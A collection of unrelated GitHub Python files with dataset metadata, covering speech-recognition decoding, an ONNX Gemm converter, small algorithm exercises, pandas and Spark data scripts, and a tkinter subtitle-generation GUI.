int(self.cfg.general.feature_freq),\n int(self.cfg.general.nfilt))\n feature.get_mel_int_feature(wave)\n feature_data = feature.copy_mfsc_feature_int_to().astype(np.float32)\n\n # 模型前向传播\n if self.cfg.model.bool_caffe:\n net_output = model.caffe_model_forward(self.asr_net,\n feature_data,\n self.cfg.model.asr_net_input_name,\n self.cfg.model.asr_net_output_name)\n net_output = np.squeeze(net_output)\n net_output = net_output.T\n elif self.cfg.model.bool_pytorch:\n net_output = model.pytorch_model_forward(self.asr_net,\n feature_data,\n self.bool_gpu)\n net_output = np.squeeze(net_output)\n\n # decode\n if self.cfg.general.decode_id == 0:\n raise NotImplementedError\n elif self.cfg.general.decode_id == 1:\n net_output = torch.from_numpy(net_output)\n # symbol_list = self.asr_beamsearch.prefix_beam_search(net_output, lm=self.lm)\n symbol_list = self.asr_beamsearch.prefix_beam_search_contextbias(net_output, lm=self.lm, lm_weight=0.3)\n else:\n raise Exception(\"[Unknow:] cfg.general.decode_id = {}\".format(self.cfg.general.decode_id))\n\n if self.cfg.general.language_id == 0:\n #print('beamsearch result: ',symbol_list)\n if(0):\n detect_token = primary_token_pass(symbol_list, self.graph)\n result = Decode_Python.get_ouststr(detect_token)\n else:\n result = self.graph.parse_command(symbol_list)\n result = (result.symbols,result.commands)\n\n elif self.cfg.general.language_id == 1:\n raise NotImplementedError\n else:\n raise Exception(\"[Unknow:] cfg.general.language_id = {}\".format(self.cfg.general.language_id))\n\n return result\n\n def asr_vad_detecte_pos(self, start_pos_id, end_pos_id):\n # init\n result = ('',[])\n\n # feature\n # 获取特征\n start_pos_time = max(int(start_pos_id / self.cfg.general.sample_rate * 100), 0)\n end_pos_time = min(int(end_pos_id / self.cfg.general.sample_rate * 100), self.params_dict['feature_data_container_np'].shape[0])\n feature_data_asr = self.params_dict['feature_data_container_np'][start_pos_time : end_pos_time, :].astype(np.float32)\n\n # 模型前向传播\n if self.cfg.model.bool_caffe:\n net_output = model.caffe_model_forward(self.asr_net,\n feature_data_asr,\n self.cfg.model.asr_net_input_name,\n self.cfg.model.asr_net_output_name)\n net_output = np.squeeze(net_output)\n net_output = net_output.T\n elif self.cfg.model.bool_pytorch:\n net_output = model.pytorch_model_forward(self.asr_net,\n feature_data_asr,\n self.bool_gpu)\n net_output = np.squeeze(net_output)\n\n # decode\n if self.cfg.general.decode_id == 0:\n raise NotImplementedError\n elif self.cfg.general.decode_id == 1:\n net_output = torch.from_numpy(net_output)\n symbol_list = self.asr_beamsearch.prefix_beam_search(net_output, lm=self.lm)\n # symbol_list = self.asr_beamsearch.prefix_beam_search_contextbias(net_output, lm=self.lm, lm_weight=0.3)\n else:\n raise Exception(\"[Unknow:] cfg.general.decode_id = {}\".format(self.cfg.general.decode_id))\n\n if self.cfg.general.language_id == 0:\n #print('beamsearch result: ',symbol_list)\n if(0):\n detect_token = primary_token_pass(symbol_list, self.graph)\n result = Decode_Python.get_ouststr(detect_token)\n else:\n result = self.graph.parse_command(symbol_list)\n result = (result.symbols,result.commands)\n\n elif self.cfg.general.language_id == 1:\n raise NotImplementedError\n else:\n raise Exception(\"[Unknow:] cfg.general.language_id = {}\".format(self.cfg.general.language_id))\n\n return result\n\n def asr_vad_state_reset(self, reset_vad_falg = True):\n self.params_dict['asr_vad_audio_data_container_np'] = np.zeros(\n int(self.cfg.general.sample_rate * self.cfg.general.asr_vad_audio_data_ms / 1000.0))\n self.params_dict['asr_vad_activate_pos_id'] = 0\n self.params_dict['asr_vad_flag_count'] = 0\n self.params_dict['asr_vad_activate_flag'] = False\n if reset_vad_falg:\n self.params_dict['asr_vad_flag'] = False\n self.params_dict['asr_vad_loop_times'] = 0\n self.params_dict['asr_vad_first_detect']=True\n\n def asr_duplicate_update_counter(self):\n for key in self.params_dict['asr_duplicate_counter']:\n if self.params_dict['asr_duplicate_counter'][key] > 0:\n self.params_dict['asr_duplicate_counter'][key] = self.params_dict['asr_duplicate_counter'][\n key] - self.cfg.general.window_size_ms\n #print(key, self.params_dict['asr_duplicate_counter'][key])\n\n def asr_duplicate_check(self, asr_string):\n if(1):\n res_list=[]\n for idx in range(len(asr_string)):\n if 'Wakeup' in asr_string[idx].cmd:\n res_list.append(asr_string[idx])\n continue\n if asr_string[idx].cmd not in self.params_dict['asr_duplicate_counter']:\n self.params_dict['asr_duplicate_counter'][asr_string[idx].cmd] = self.cfg.general.total_time_ms\n res_list.append(asr_string[idx])\n else:\n if self.params_dict['asr_duplicate_counter'][asr_string[idx].cmd] > 0:\n continue\n else:\n self.params_dict['asr_duplicate_counter'][asr_string[idx].cmd] = self.cfg.general.total_time_ms\n res_list.append(asr_string[idx])\n return res_list\n else:\n res_string = \"\"\n tmp_string = asr_string.split(' ')\n for idx in range(len(tmp_string)):\n if '小锐小锐_唤醒' in tmp_string[idx]:\n res_string += tmp_string[idx] + \" \"\n continue\n if tmp_string[idx] not in self.params_dict['asr_duplicate_counter']:\n self.params_dict['asr_duplicate_counter'][tmp_string[idx]] = self.cfg.general.total_time_ms\n res_string += tmp_string[idx] + \" \"\n else:\n if self.params_dict['asr_duplicate_counter'][tmp_string[idx]] > 0:\n continue\n else:\n self.params_dict['asr_duplicate_counter'][tmp_string[idx]] = self.cfg.general.total_time_ms\n res_string += tmp_string[idx] + \" \"\n return res_string","repo_name":"ProLing1994/demo","sub_path":"Speech/API/Kws_weakup_Asr/RMAI_KWS_ASR_API_Canbin.py","file_name":"RMAI_KWS_ASR_API_Canbin.py","file_ext":"py","file_size_in_byte":37798,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"93"} +{"seq_id":"41722036912","text":"import stack\n\n\nclass Dijkstra:\n def __init__(self):\n self.values = stack.ArrayStack()\n self.operations = stack.ArrayStack()\n\n def calculate(self, expression: str):\n for char in expression:\n if char == ')':\n right_value = self.values.pop()\n left_value = self.values.pop()\n operation = self.operations.pop()\n if operation == '+':\n result = left_value + right_value\n elif operation == '-':\n result = left_value - right_value\n elif operation == '*':\n result = left_value * right_value\n elif operation == '/':\n result = left_value / right_value\n self.values.push(result)\n elif char in ['+', '-', '*', '/']:\n self.operations.push(char)\n elif self.try_parse_int(char):\n self.values.push(int(char))\n else:\n continue\n return self.values.pop()\n\n def try_parse_int(self, char):\n try:\n int(char)\n return True\n except ValueError:\n return False\n\n\nif __name__ == '__main__':\n dijkstra = Dijkstra()\n print(dijkstra.calculate('(1+((2+3)*(4*5)))'))\n","repo_name":"max-teren/algorithms","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"10791814349","text":"#Nikola Petreski\n#M02 Lab\n#This program will ask you to enter your name and GPA, and inform you if you have made either the Honor Roll or the Dean's List.\n\ndef gpaReturn():\n\n firstName = input(\"Please enter your first name: \")\n gpaInput = float(input(\"Please enter your GPA: \"))\n if (gpaInput>=3.5): \n print(f\"Congratulations, {firstName}! You have made the Dean's List.\")\n elif (3.5>gpaInput>=3.25):\n print(f\"Congratulations, {firstName}! You have made the Honor Roll.\")\n else: \n print(f\"Sorry, {firstName}! You have not made the Dean's List or the honor roll.\")\n\ndef gpaFunction():\n lastName = input(\"Please enter your last name. If you would like to exit, please type 'ZZZ': \") \n while lastName == 'ZZZ':\n print('Thank You.')\n break\n else: gpaReturn()\n\ngpaFunction()\n","repo_name":"Tarnishing/m02Lab","sub_path":"m02LAB.py","file_name":"m02LAB.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"9478279281","text":"import pickle\nfrom sklearn.neighbors import KNeighborsClassifier\nimport math \n\nNearest = pickle.load(open('./model/Nearest.sav', 'rb'))\n\ndef slope(p1,p2):\n dy=p1['y']-p2['y']\n dx=p1['x']-p2['x']\n return dy/dx\n\ndef dis(p1,p2):\n dy=(p1['y']-p2['y'])**2\n dx=(p1['x']-p2['x'])**2\n return dy+dx\n \ndef angle(m1,m2):\n val=(m1-m2)/(1+(m1*m2))\n if val<0:\n val=val*(-1)\n val=math.degrees(math.atan(val))\n return val\n \ndef render(l):\n #dist=dis(l['1'],l['2'])\n dist=dis(l['5'],l['6'])\n print(dist)\n #dis_lim=[15500,8000][l['7']]\n #max_lim=[2500,2000][l['7']]\n dis_lim=[140000,120000][l['7']]\n max_lim=[50000,34000][l['7']]\n alpha_lim=[0.1,0.07][l['7']]\n beta_lim=[95,95][l['7']]\n m0=slope(l['5'],l['6'])\n m1=slope(l['5'],l['0'])\n m2=slope(l['6'],l['0'])\n alpha=slope(l['5'],l['6'])\n if alpha <0:\n alpha*=-1\n gama1=angle(m1,m0)\n gama2=angle(m2,m0)\n beta=(180-gama1-gama2)\n if dist>dis_lim:\n return 2\n elif distalpha_lim or beta>beta_lim:\n return 1\n else:\n return 0\n","repo_name":"Garvit9000c/PosMate","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"93"} +{"seq_id":"4166694122","text":"# 22.09.29\n# 백준 / 10026번 적록색약\n\ndef checkArea(visited, pos, isWeak):\n stack = [pos]\n visited[pos[1]][pos[0]] = True\n\n while stack:\n curPos = stack.pop()\n for s in sameAreaCase:\n nextX = curPos[0] + s[0]\n nextY = curPos[1] + s[1]\n if nextX < 0 or nextX >= N or nextY < 0 or nextY >= N:\n continue\n\n visitedValue = visited[nextY][nextX]\n\n if not visitedValue:\n curValue = board[curPos[1]][curPos[0]]\n nextValue = board[nextY][nextX]\n if isWeak:\n if (nextValue == curValue) or (\n curValue == 'R' and nextValue == 'G') or (\n curValue == 'G' and nextValue == 'R'):\n stack.append([nextX, nextY])\n visited[nextY][nextX] = True\n\n else:\n if nextValue == curValue:\n stack.append([nextX, nextY])\n visited[nextY][nextX] = True\n\n\nN = int(input())\nboard = []\nfor i in range(N):\n board.append(list(input()))\n\nweakVisited = [[False] * N for i in range(N)]\nnotWeakVisited = [[False] * N for i in range(N)]\n\nsameAreaCase = [[-1, 0], [1, 0], [0, -1], [0, 1]]\nnotWeakAns = 0\nweakAns = 0\n\nx = 0\ny = 0\nwhile x < N and y < N:\n while (y < N) and (weakVisited[y][x]):\n x += 1\n if x >= N:\n x = 0\n y += 1\n if y < N:\n weakAns += 1\n checkArea(weakVisited, [x, y], True)\n\nx = 0\ny = 0\nwhile x < N and y < N:\n while (y < N) and (notWeakVisited[y][x]):\n x += 1\n if x >= N:\n x = 0\n y += 1\n if y < N:\n notWeakAns += 1\n checkArea(notWeakVisited, [x, y], False)\n\nprint(notWeakAns, weakAns)\n","repo_name":"Sehbeom/CodingTest","sub_path":"BaekJoon/DFSBFS/220929_RGColorWeakness/RGColorWeakness.py","file_name":"RGColorWeakness.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"16714400951","text":"__all__ = ['OnnxGeneralLinear']\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom onnx2torch.node_converters.registry import add_converter\nfrom onnx2torch.onnx_graph import OnnxGraph\nfrom onnx2torch.onnx_node import OnnxNode\nfrom onnx2torch.utils.common import OnnxMapping\nfrom onnx2torch.utils.common import OnnxToTorchModule\nfrom onnx2torch.utils.common import OperationConverterResult\n\n\nclass OnnxGeneralLinear(nn.Linear, OnnxToTorchModule):\n \"\"\"General Linear layer with functionality of ONNX GEMM node.\n\n For additional info https://github.com/onnx/onnx/blob/master/docs/Operators.md#Gemm\n \"\"\"\n\n def __init__(\n self,\n in_features: int,\n out_features: int,\n bias: bool,\n trans_a: int,\n ):\n\n super().__init__(\n in_features=in_features,\n out_features=out_features,\n bias=bias,\n )\n # If != 0 transpose input before matmul\n self.trans_a = trans_a\n\n def forward(self, input_tensor: torch.Tensor) -> torch.Tensor: # pylint: disable=arguments-renamed\n input_tensor = torch.transpose(input_tensor, 0, 1) if self.trans_a != 0 else input_tensor\n return F.linear(input_tensor, self.weight, self.bias)\n\n @classmethod\n def maybe_create_simple_linear(\n cls,\n in_features: int,\n out_features: int,\n bias: bool,\n trans_a: int,\n ):\n if trans_a == 0:\n return nn.Linear(in_features=in_features, out_features=out_features, bias=bias)\n\n return OnnxGeneralLinear(in_features, out_features, bias, trans_a)\n\n\n@add_converter(operation_type='Gemm', version=9)\n@add_converter(operation_type='Gemm', version=11)\n@add_converter(operation_type='Gemm', version=13)\ndef _(node: OnnxNode, graph: OnnxGraph) -> OperationConverterResult:\n weights_value_name = node.input_values[1]\n weights = graph.initializers[weights_value_name]\n weights = weights.to_torch()\n\n # An empty string may be used in the place of an actual argument's name to indicate a missing argument.\n # See ONNX documentation\n if len(node.input_values) == 3 and node.input_values[2] != '':\n bias_value_name = node.input_values[2]\n bias = graph.initializers[bias_value_name]\n bias = bias.to_torch()\n else:\n bias = None\n\n node_attributes = node.attributes\n alpha = node_attributes.get('alpha', 1.0)\n beta = node_attributes.get('beta', 1.0)\n trans_a = node_attributes.get('transA', 0)\n trans_b = node_attributes.get('transB', 0)\n\n if trans_b == 0:\n in_features, out_features = weights.shape[0], weights.shape[1]\n else:\n in_features, out_features = weights.shape[1], weights.shape[0]\n\n torch_module = OnnxGeneralLinear.maybe_create_simple_linear(\n in_features=in_features,\n out_features=out_features,\n bias=bias is not None,\n trans_a=trans_a,\n )\n\n with torch.no_grad():\n # In pytorch weights are transposed by default (see documentation)\n # So we transpose weights before matmul if trans_b == 0\n weights = torch.transpose(weights, 0, 1) if trans_b == 0 else weights\n weights = weights * alpha\n torch_module.weight.data = weights\n if bias is not None:\n bias = bias * beta\n torch_module.bias.data = bias\n\n return OperationConverterResult(\n torch_module=torch_module,\n onnx_mapping=OnnxMapping(\n inputs=(node.input_values[0],),\n outputs=node.output_values,\n ),\n )\n","repo_name":"cakeofwar42/onnx2torch","sub_path":"onnx2torch/node_converters/gemm.py","file_name":"gemm.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"93"} +{"seq_id":"8664196585","text":"#**题目:**输入一颗二叉树的根节点和一个整数,打印出二叉树中结点值的和为输入整数的所有路径。\r\n#路径定义为从树的根结点开始往下一直到叶结点所经过的结点形成一条路径。(注意: 在返回值的list中,数组长度大的数组靠前)。\r\n#**思路:**利用递归的方法,计算加左子树和右子树之后的值,当参数较多是,可以将结果添加到函数变量之中。\r\nclass TreeNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\n\r\nclass method():\r\n # 返回二维列表,内部每个列表表示找到的路径\r\n def FindPath(self, root, expectNumber):\r\n # write code here\r\n if not root:\r\n return []\r\n ans=[]\r\n path=[]\r\n self.dfs(root,expectNumber,ans,path)\r\n ans.sort()\r\n return ans\r\n\r\n def dfs(self,root,target,ans,path):\r\n if not root:\r\n return\r\n\r\n path.append(root.val)\r\n if root.left is None and root.right is None and target==root.val:\r\n ans.append(path[:])\r\n\r\n if root.left:\r\n self.dfs(root.left,target-root.val,ans,path)\r\n if root.right:\r\n self.dfs(root.right,target-root.val,ans,path)\r\n\r\n path.pop()\r\n#比较好的做法是将path设为全局的,然后dfs的过程便是先序遍历的过程,一旦遍历到叶子结点,\r\n#便将path最后的节点移除掉,这样在递归一层一层进行的时候将值添加进path,在递归返回的过程\r\n#中将path最末尾的元素一个一个移除。这样便依靠递归的特性完成了路径的恢复。","repo_name":"foxzyxu/offer","sub_path":"24.二叉树中和为某一值的路径.py","file_name":"24.二叉树中和为某一值的路径.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"18583991306","text":"\r\n#Using normal function or iteration\r\ndef recstar(no):\r\n sum=0\r\n for i in range(no):\r\n rem=no%10\r\n sum=sum+rem\r\n no= int(no/10)\r\n print(sum)\r\nsumm=0\r\n#Using the recursion\r\ndef recustar(no):\r\n if no!=0:\r\n rem = no % 10\r\n global summ\r\n summ = summ + rem\r\n recustar(int(no / 10))\r\n return(summ)\r\n\r\ndef main():\r\n no = int(input(\"Enter the number \"))\r\n print(\"Using recusrion method :\")\r\n res=recustar(no)\r\n print(res)\r\n print(\"Using normal iteration method :\")\r\n recstar(no)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"sanketc029/python_assi5","sub_path":"Assi_5/Assi5_4.py","file_name":"Assi5_4.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"28081119536","text":"import requests\nimport pandas\n\nr = requests.get(\"https://raw.githubusercontent.com/lutydlitatova/python-jaro-2022/main/ukoly/data/zam_praha.csv\")\nopen(\"zam_praha.csv\", \"wb\").write(r.content)\n\nr = requests.get(\"https://raw.githubusercontent.com/lutydlitatova/python-jaro-2022/main/ukoly/data/zam_plzeň.csv\")\nopen(\"zam_plzeň.csv\", \"wb\").write(r.content)\n\nr = requests.get(\"https://raw.githubusercontent.com/lutydlitatova/python-jaro-2022/main/ukoly/data/zam_liberec.csv\")\nopen(\"zam_liberec.csv\", \"wb\").write(r.content)\n\nr = requests.get(\"https://raw.githubusercontent.com/lutydlitatova/python-jaro-2022/main/ukoly/data/platy_2021_02.csv\")\nopen(\"platy_2021_02.csv\", \"wb\").write(r.content)\n\nzam_praha=pandas.read_csv('zam_praha.csv')\nzam_plzen=pandas.read_csv('zam_plzeň.csv')\nzam_liberec=pandas.read_csv('zam_liberec.csv')\nplaty202102=pandas.read_csv('platy_2021_02.csv')\n\nzam_praha ['město']= 'Praha'\nzam_plzen ['město']= 'Plzeň'\nzam_liberec ['město']= 'Liberec'\n\nzamestnanci = pandas.concat([zam_praha,zam_plzen,zam_liberec], ignore_index=True)\n#print(zamestnanci.shape)\nzam202102= pandas.merge(zamestnanci, platy202102, on=['cislo_zamestnance'],how='left')\n#print(zam202102.shape)\n\nprumerPlat=zam202102.groupby('město')['plat'].mean()\njizNepracuji=zam202102[zam202102['plat'].isnull()]\njizNepracuji.to_csv('UkonceniZamestnanci.csv',index=False)\njizNepracujiPocet=jizNepracuji['cislo_zamestnance'].count()\nprint(jizNepracujiPocet)\n","repo_name":"EvaKolacek/python-kurz-2022","sub_path":"ukol-11.py","file_name":"ukol-11.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"11491876241","text":"# Practice writing functions and looping over dictionaries\n# Achieve a better understanding of how to traverse through a list of dictionaries or through a dictionary of lists\n# x = [[5, 2, 3], [10, 8, 9]]\n# students = [\n# {'first_name': 'Michael', 'last_name': 'Jordan'},\n# {'first_name': 'John', 'last_name': 'Rosales'}\n# ]\n# sports_directory = {\n# 'basketball': ['Kobe', 'Jordan', 'James', 'Curry'],\n# 'soccer': ['Messi', 'Ronaldo', 'Rooney']\n# }\n# z = [{'x': 10, 'y': 20}]\n\n\n# 1.Change the value 10 in x to 15. Once you're done, x should now be [ [5,2,3], [15,8,9] ].\n\n# x[1][0] = 15\n# print(x)\n\n# 2. Change the last_name of the first student from 'Jordan' to 'Bryant'\n# students[0][\"last_name\"] = \"Bryant\"\n# print(students)\n\n\n# 3 In the sports_directory, change 'Messi' to 'Andres'\n# sports_directory[\"soccer\"][0] = \"Andres\"\n# print(sports_directory)\n\n# # 4 Change the value 20 in z to 30\n# z[0][\"y\"] = 30\n# print(z)\n\n\n'''\nCreate a function iterateDictionary(some_list) that, given a list of dictionaries,\nthe function loops through each dictionary in the list and prints each key and the associated value.\nFor example, given the following list: '''\n\nstudents = [\n {'first_name': 'Michael', 'last_name': 'Jordan'},\n {'first_name': 'John', 'last_name': 'Rosales'},\n {'first_name': 'Mark', 'last_name': 'Guillen'},\n {'first_name': 'KB', 'last_name': 'Tonel'}\n]\n# iterateDictionary(students)\n# should output: (it's okay if each key-value pair ends up on 2 separate lines;\n# bonus to get them to appear exactly as below!)\n# first_name - Michael, last_name - Jordan\n# first_name - John, last_name - Rosales\n# first_name - Mark, last_name - Guillen\n# first_name - KB, last_name - Tonel\n\n\n# def iterateDictionary(full_names):\n# for name in full_names:\n# # loop through the list of items that are stored as dictionary items\n# # print(lists)\n# for key in name:\n# # create an inner loop to grab the key for each dictionary item\n# print(f\"{key} - {name[key]}\")\n# # use a formated string to print out the key of the each dictionary item and as well as the value.\n# # print(key)\n# # print(lists[key])\n\n\n''' to get the value of a dictionary item - one way is to write the syntax like this : dict[\"key\"] (will grant u access the value to that specific key)'''\n\n\n# iterateDictionary(students)\n\n\n'''\nGet Values From a List of Dictionaries\nCreate a function iterateDictionary2(key_name, some_list) that, given a list of dictionaries and a key name, \nthe function prints the value stored in that key for each dictionary. \nFor example, iterateDictionary2('first_name', students) should output:\n'''\n\n\n# def iterateDictionary2(key_name, full_names):\n# for name in full_names:\n# # iterates through the list that contains dictionary items\n# for key in name:\n# # iterates through each dictionary item which has 2 key, value pairs fo each item\n# if key_name == key:\n# # do a validation here to check to see if the key_name which is the argument passed in matches a key\n# print(name[key])\n# # else:\n# # print(\"not found\")\n\n\n# iterateDictionary2(\"last_name\", students)\n\n\n'''\nIterate Through a Dictionary with List Values\nCreate a function printInfo(some_dict) that given a dictionary whose values are all lists, \nprints the name of each key along with the size of its list, and then prints the associated values within each key's list. \nFor example:\n'''\n\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\n\ndef print_info(coding):\n # for key, value in coding.items():\n # print(key, value)\n for key in coding:\n print(key, len(coding[key]))\n for value in coding[key]:\n print(value)\n # print(coding[key])\n\n # print(dojo[\"locations\"])\n # print(dojo[\"instructors\"])\n # print(dojo[\"instructors\"][0])\n\n\nprint_info(dojo)\n","repo_name":"mkshin1/python_fundamentals","sub_path":"intermediate_functions2.py","file_name":"intermediate_functions2.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"18402593846","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n if(not headA or not headB):\n return None\n ptrA, ptrB = headA, headB\n while(ptrA != ptrB):\n ptrA = ptrA.next if(ptrA) else headB\n ptrB = ptrB.next if(ptrB) else headA\n return ptrA\n","repo_name":"Xiderowg/LeetCode","sub_path":"Python/Intersection of Two Linked Lists/Intersection of Two Linked Lists.py","file_name":"Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"22371479018","text":"import os\nimport json\nfrom shutil import copy2\n\n# Load config.json and correct path variable\nwith open('config.json', 'r') as f:\n config = json.load(f)\n\ningested_record_path = os.path.join(\n config['output_folder_path'],\n \"ingestedfiles.txt\")\nprod_deployment_dir = os.path.join(config['prod_deployment_path'])\nmodel_path = os.path.join(config['output_model_path'], \"trainedmodel.pkl\")\nscore_path = os.path.join(config['output_model_path'], \"latestscore.txt\")\n\n\n# function for deployment\ndef copy_files_to_deployment_dir():\n \"\"\"\n copy the latest pickle file, the latestscore.txt value, and the ingestfiles.txt file into the deployment directory\n \"\"\"\n copy2(ingested_record_path, prod_deployment_dir)\n copy2(model_path, prod_deployment_dir)\n copy2(score_path, prod_deployment_dir)\n\n\nif __name__ == \"__main__\":\n copy_files_to_deployment_dir()\n","repo_name":"ZaidGhazal/Dynamic-Risk-Assessment-System","sub_path":"deployment.py","file_name":"deployment.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"71693150705","text":"\nimport re\nimport boto3\n\nfrom pyspark.sql.types import DateType\nfrom pyspark.sql.functions import udf, year, month\nfrom pyspark.sql.types import *\nfrom datetime import datetime\n\nbucket_name = 'yonglun-udacity-capstone'\ns3_bucket_name = 's3://yonglun-udacity-capstone'\n\nsas_description_filekey = 'raw/I94_SAS_Labels_Descriptions.SAS'\nsas_description_filename = '/tmp/I94_SAS_Labels_Descriptions.SAS'\n\ndef parse_datetime(x):\n try:\n # Try parse yyyy-MM-dd\n return datetime.strptime(x, \"%Y-%m-%d\")\n except:\n try:\n # Try parse dd-MM-yy\n return datetime.strptime(x, \"%d-%m-%y\")\n except:\n return None\nudf_parse_datetime = udf(lambda x: parse_datetime(x), DateType())\n\ndef map_country(city):\n for key, value in valid_city.items():\n if city.lower() == value.lower():\n return key\nudf_map_country = udf(lambda x : map_country(x), StringType())\n\n#Parse Data Labels\n# S3 client\ns3 = boto3.resource('s3',\n region_name=\"us-west-2\",\n aws_access_key_id=access_key,\n aws_secret_access_key=secret_key,\n )\n\n# Get Label Descriptions File\ns3.Bucket(bucket_name).download_file(sas_description_filekey, sas_description_filename)\n\nwith open(sas_description_filename) as header_file:\n lines = header_file.readlines()\n\n # valid_city: Line 10 to 298\n # valid_city len: 289\n city_regex = re.compile(r'([0-9]+)(.*)(\\'.*\\')(\\s\\;)?')\n valid_city = {}\n for line in lines[9:298]:\n match_groups = city_regex.search(line)\n valid_city[int(match_groups.group(1))] = match_groups.group(3).strip('\\'')\n\nfilepath = '{}/raw/global_temperature/GlobalLandTemperaturesByCity.csv'.format(s3_bucket_name)\n\n# Load\nraw_temp_df = spark.read.format(\"csv\").option(\"header\", \"true\").load(filepath)\n\n# Clean\ncleaned_temp_df = raw_temp_df\\\n .filter(raw_temp_df.AverageTemperature.isNotNull())\\\n .filter(raw_temp_df.AverageTemperatureUncertainty.isNotNull())\\\n\n# Transform\ntransformed_temp_df = cleaned_temp_df\\\n .select(\"dt\",\n \"AverageTemperature\",\n \"AverageTemperatureUncertainty\",\n \"City\",\n \"Country\",\n \"Latitude\",\n \"Longitude\")\\\n .withColumn(\"dt\", udf_parse_datetime(\"dt\"))\\\n .withColumnRenamed(\"AverageTemperature\", \"avg_temp\")\\\n .withColumnRenamed(\"AverageTemperatureUncertainty\", \"avg_temp_uncertainty\")\\\n .withColumn(\"city_code\", udf_map_country(\"country\"))\\\n .withColumnRenamed(\"City\", \"city\")\\\n .withColumnRenamed(\"Country\", \"country\")\\\n .withColumnRenamed(\"Latitude\", \"latitude\")\\\n .withColumnRenamed(\"Longitude\", \"longitude\")\\\n .withColumnRenamed(\"dt\", \"date_time\")\\\n .withColumn('month', month('date_time')) \\\n .withColumn('year', year('date_time')) \\\n\ntransformed_temp_df = transformed_temp_df.filter(transformed_temp_df.city_code != 'null')\n\n# Write\ntransformed_temp_df.write\\\n .partitionBy(\"city_code\", \"year\", \"month\")\\\n .mode(\"append\")\\\n .parquet(\"{}/transformed/temperature/\".format(s3_bucket_name))\n\n","repo_name":"cyonglun/udacity-data-engineering-capstone","sub_path":"dags/transform/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"30958120419","text":"import os\r\nimport tkinter as tk\r\n\r\ndef CurSelet():\r\n if listbox1.get(tk.ANCHOR) == '':\r\n Label1.config(text = 'Seleciona un video')\r\n elif v.get() == '':\r\n Label1.config(text = 'Seleciona un idioma')\r\n else:\r\n comandament='py .\\creaSubtitulos.py .\\\\videos\\\\{} {}'.format(listbox1.get(tk.ANCHOR), v.get())\r\n os.system(comandament)\r\n Label1.config(text = 'Creando Subtitulos')\r\n\r\n\r\ncontenido = os.listdir('./videos')\r\naux = []\r\nfor i in range(len(contenido)):\r\n if contenido[i][len(contenido[i])-3:] != 'srt':\r\n aux.append(contenido[i]) \r\ncontenido = aux\r\nidiomas = ['es-ES', 'ca-ES', 'en-GB', 'en-Us']\r\n\r\n\r\nroot = tk.Tk()\r\namplada = 400\r\nalcada = 400\r\nstrink = '{}x{}'.format(amplada,alcada)\r\nroot.geometry(strink)\r\nroot.attributes('-fullscreen', False)\r\n\r\nc= tk.Canvas(root,bg='blue')\r\nc.place(x=0,y=0,width=amplada,height=alcada)\r\n\r\nlistbox1 = tk.Listbox(c)\r\nlistbox1.place(x = 10, y = 10, width = 190, height = 180)\r\nfor item in contenido:\r\n listbox1.insert(tk.END, item)\r\n\r\nv = tk.StringVar()\r\nr1 = tk.Radiobutton(c, text = \"es-ES\", variable = v, value = idiomas[0], state=tk.ACTIVE)\r\nr1.place(x = 3*amplada//4, y = 10)\r\nr2 = tk.Radiobutton(c, text = \"ca-ES\", variable = v, value = idiomas[1])\r\nr2.place(x = 3*amplada//4, y = 40)\r\nr3 = tk.Radiobutton(c, text = \"en-GB\", variable = v, value = idiomas[2])\r\nr3.place(x = 3*amplada//4, y = 70)\r\nr4 = tk.Radiobutton(c, text = \"en-Us\", variable = v, value = idiomas[3])\r\nr4.place(x = 3*amplada//4, y = 100)\r\n\r\nLabel1 = tk.Label(c, text = '', width = 0, font = ('Arial', 12), bg = c.cget('bg'))\r\nLabel1.place(x = 200, y = 350, anchor =\"center\")\r\n\r\nButton1 = tk.Button(c, text = \"Crea Subtitulo\", command = CurSelet)\r\nButton1.place(x = 200, y = 300, anchor 